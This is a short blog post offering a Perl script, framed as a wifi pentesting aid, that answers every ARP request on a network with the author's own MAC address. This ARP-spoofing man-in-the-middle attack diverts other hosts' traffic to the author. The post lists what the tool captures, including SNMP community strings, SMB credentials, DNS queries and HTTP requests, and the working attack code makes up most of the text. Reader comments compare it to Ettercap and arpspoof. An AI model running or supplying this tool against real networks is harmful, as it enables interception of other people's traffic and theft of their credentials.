Me All – For your wifi pentesting pleasure

Sitting at a security conference in Boston, I wrote down a quick and dirty script that just listen for ARP requests and responds to any such requests with … Hay That is Me ™ :) … The things you can find using that… here is a summary:

1) SNMP community names
2) SMB keypairs (you need to use fakesmb)
3) DNS queries (if you answer them it is even more fun)
4) HTTP requests for odd stuff (once you answered the DNS queries, and have set Apache to answer incoming connections you are all set)

I am sure a lot more can be done… I will leave it to your imagination

#!/usr/bin/perl
# Writen by Noam Rathaus, Beyond Security (r)

use Net::Pcap;

my $Interface = “eth1″;

my $mymac = “00:00:E4:CF:BE:AF”;
if(open(IFCONFIG, “/sbin/ifconfig $Interface |”))
{
while (<IFCONFIG>)
{
if ($_ =~ /HWaddr (.*)/)
{
$mymac = $1;
}
}
close(IFCONFIG);
}

my $stripped = $mymac;
$stripped =~ s/://g;
my ($err, $filtert);

my $pcap_t = Net::Pcap::open_live($Interface, 60, 0, 10, \$err);
if (Net::Pcap::datalink($pcap_t) != 1)
{
print “Pcap error: only ethernet is currently supported\n”;
exit(0);
}

my $filter = “arp”;
if (Net::Pcap::compile($pcap_t, \$filtert, $filter, 1, 0) == -1)
{
print “Pcap error: filter failed to compile\n”;
exit(0);
}

Net::Pcap::setfilter($pcap_t, $filtert);
print STDOUT “[*] Monitoring requests…\n”;

while (1)
{
my %hdr;
if ($pkt = Net::Pcap::next($pcap_t, \%hdr))
{
my ( $ether_dst , $ether_src , $ether_type , $dunno , $reply ,
$arp_src_mac ,
$arp_src_ipa, $arp_src_ipb, $arp_src_ipc, $arp_src_ipd,
$arp_dst_mac,
$arp_dst_ipa, $arp_dst_ipb, $arp_dst_ipc, $arp_dst_ipd)
= unpack ( ‘H12 H12 H4 H14 C H12 C4 H12 C4′ , $pkt ) ;

if ($reply eq 2) { next; }
if (lc($arp_src_mac) eq lc($stripped)) { next; }

my @arp_src = split(/([0-9a-z][0-9a-z])/, $arp_src_mac);
$arp_src_mac = join(“:”, @arp_src);
$arp_src_mac =~ s/^://;
$arp_src_mac =~ s/::/:/g;

$arp_dst_mac = $mymac;

print “Src ($arp_src_mac): $arp_src_ipa.$arp_src_ipb.$arp_src_ipc.$arp_src_ipd\n”;
print “Dst ($arp_dst_mac): $arp_dst_ipa.$arp_dst_ipb.$arp_dst_ipc.$arp_dst_ipd\n”;

use Net::ARP;
Net::ARP::send_packet($Interface, # Device
“$arp_dst_ipa.$arp_dst_ipb.$arp_dst_ipc.$arp_dst_ipd”, # Source IP
“$arp_src_ipa, $arp_src_ipb, $arp_src_ipc, $arp_src_ipd”, # Destination IP
“$arp_dst_mac”, # Source MAC
“$arp_src_mac”, # Destinaton MAC
‘reply’); # ARP operation
}
}

Share
  • Tyler

    …isn’t that exactly what Ettercap does?

  • http://blog.madduck.net madduck

    Also check out arpspoof in the dsniff suite.

  • roby

    The above code is just a simplified version of ettercap, arpsoof and dsniff written in perl, making it a bit more easy to use..

  • Pingback: Alessandro "jekil" Tanasi blog